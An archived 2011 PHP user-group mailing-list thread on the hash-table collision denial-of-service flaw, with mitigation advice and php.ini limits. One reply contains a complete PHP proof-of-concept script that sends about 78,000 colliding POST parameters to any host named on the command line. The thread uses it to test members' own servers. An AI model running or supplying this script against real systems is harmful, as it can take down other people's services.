Ben,
Thanks for the reply. I ran the PoC below against my servers and it looks like we are in OK shape. After reading your response, I contemplated the options and realized that we are running Suhosin and are already managing the max post/request variables. Dur... Here is a bit more reading for the group: http://seclists.org/fulldisclosure/2011/Dec/486. (A short note on why the PoC's keys collide and a minimal php.ini sketch of the relevant directives are appended at the end of this message.) Have a great new year!

Hans Kaspersetz
Cyber X Designs
http://cyberxdesigns.com

From: talk-boun...@lists.nyphp.org [mailto:talk-boun...@lists.nyphp.org] On Behalf Of Ben Sgro
Sent: Thursday, December 29, 2011 11:33 AM
To: NYPHP Talk
Subject: Re: [nyphp-talk] Hash Table Vulnerability in PHP5

Hey,

Don't allow posts with more than ~100 k/v pairs. Don't allow larger uploads than necessary. As you mentioned, I guess limit script execution time. Right now, there are some Snort signatures going around (not sure if you run IDS, etc.). I've also heard people mention a mod_rewrite regex to strip out these bad chars.

I have a PoC here you can test against your servers (and here also: http://koto.github.com/blog-kotowicz-net-examples/hashcollision/kill.html):

<?php
// hashcollider.php
// by sk
// v--- ripped from: https://github.com/koto/blog-kotowicz-net-examples/tree/master/hashcollision
//
// generate the POST of Doom
function doom() {
    // entries with collisions in PHP's hash table hash function
    $a = array(
        '0' => 'Ez',
        '1' => 'FY',
        '2' => 'G8',
        '3' => 'H' . chr(23),
        '4' => 'D' . chr(122 + 33),
    );

    // how long should the payload be
    $length = 7;
    $size   = count($a);
    $post   = '';
    $max    = pow($size, $length);

    for ($i = 0; $i < $max; $i++) {
        // express $i in base 5, then map each digit to one of the colliding blocks
        $s = str_pad(base_convert($i, 10, $size), $length, '0', STR_PAD_LEFT);
        $post .= urlencode(strtr($s, $a)) . '=&';
    }
    return $post;
}

$post = doom();

$ch = curl_init();

// target host is passed on the command line, e.g. php hashcollider.php -h http://target/
$args = getopt("h:");
$host = $args['h'];

curl_setopt($ch, CURLOPT_URL, $host);
curl_setopt($ch, CURLOPT_POST, 1);
curl_setopt($ch, CURLOPT_POSTFIELDS, $post);

printf("[x] Target: %s\n", $host);
printf("[x] CPU spike!\n");
$result = curl_exec($ch);
printf("[x] Payload sent.\n");

Good luck!

- Ben

On Dec 29, 2011, at 11:19 AM, Hans C. Kaspersetz wrote:

Good morning,

I hope everyone has seen the news about the hash table vulnerability in lots of web scripting languages. You can read about it here: http://www.securityweek.com/hash-table-collision-attacks-could-trigger-ddos-massive-scale or here: http://www.kb.cert.org/vuls/id/903934.

It looks like PHP has addressed the issue (http://www.php.net/archive/2011.php#id2011-12-25-1) by providing a max var directive in the latest RC5 for 5.4.0. However, as with all release candidates, they strongly advise against using it in production. What is the general consensus for mitigating this risk without moving to RC5? We are limiting the execution time of our scripts; however, for upload scripts or processing-intensive scripts we need to increase the execution time, which I imagine would leave those scripts more vulnerable.

Thanks,

Hans Kaspersetz
Cyber X Designs
http://cyberxdesigns.com
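Why the PoC's keys collide: PHP hashes string array keys with DJBX33A (start at 5381, then hash = hash * 33 + character). The snippet below is a minimal re-implementation for illustration only; djbx33a() is a local helper written for this sketch, not a PHP built-in. It shows that all five two-character blocks in the PoC hash to the same value, so every seven-block key the PoC generates lands in the same bucket.

<?php
// Sketch of PHP's string-key hash (DJBX33A: seed 5381, then
// hash = hash * 33 + character). Illustrative helper only.
function djbx33a($key)
{
    $hash = 5381;
    for ($i = 0, $len = strlen($key); $i < $len; $i++) {
        $hash = $hash * 33 + ord($key[$i]);
    }
    return $hash;
}

// The five building blocks used by the PoC all hash to 5862308,
// so any key assembled from them collides with every other one.
foreach (array('Ez', 'FY', 'G8', 'H' . chr(23), 'D' . chr(155)) as $key) {
    printf("%-10s => %d\n", addcslashes($key, "\0..\37"), djbx33a($key));
}

Because the hash table resolves collisions by chaining, inserting n such keys costs on the order of n^2 comparisons, which is where the CPU spike in the PoC comes from.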
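And a minimal php.ini sketch of the knobs discussed in this thread. The values are illustrative, not tuned recommendations; the suhosin.* lines assume the Suhosin extension or patch is loaded, and max_input_vars assumes the 5.4.0 release candidate (it later shipped in 5.3.9 as well).

; Cap how many input variables PHP will parse per request
; (the "max var" directive from the 5.4.0 release candidates)
max_input_vars = 1000

; Equivalent caps when running Suhosin
suhosin.post.max_vars    = 1000
suhosin.request.max_vars = 1000

; Keep POST bodies (and therefore collision payloads) reasonably small
post_max_size = 8M

; Bound script runtime as a general backstop
max_execution_time = 30

With either cap in place, the PoC's 5^7 = 78,125 colliding parameters should be cut off after the first thousand, so the worst-case hash table work never becomes expensive enough to matter.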
_______________________________________________ New York PHP Users Group Community Talk Mailing List http://lists.nyphp.org/mailman/listinfo/talk http://www.nyphp.org/Show-Participation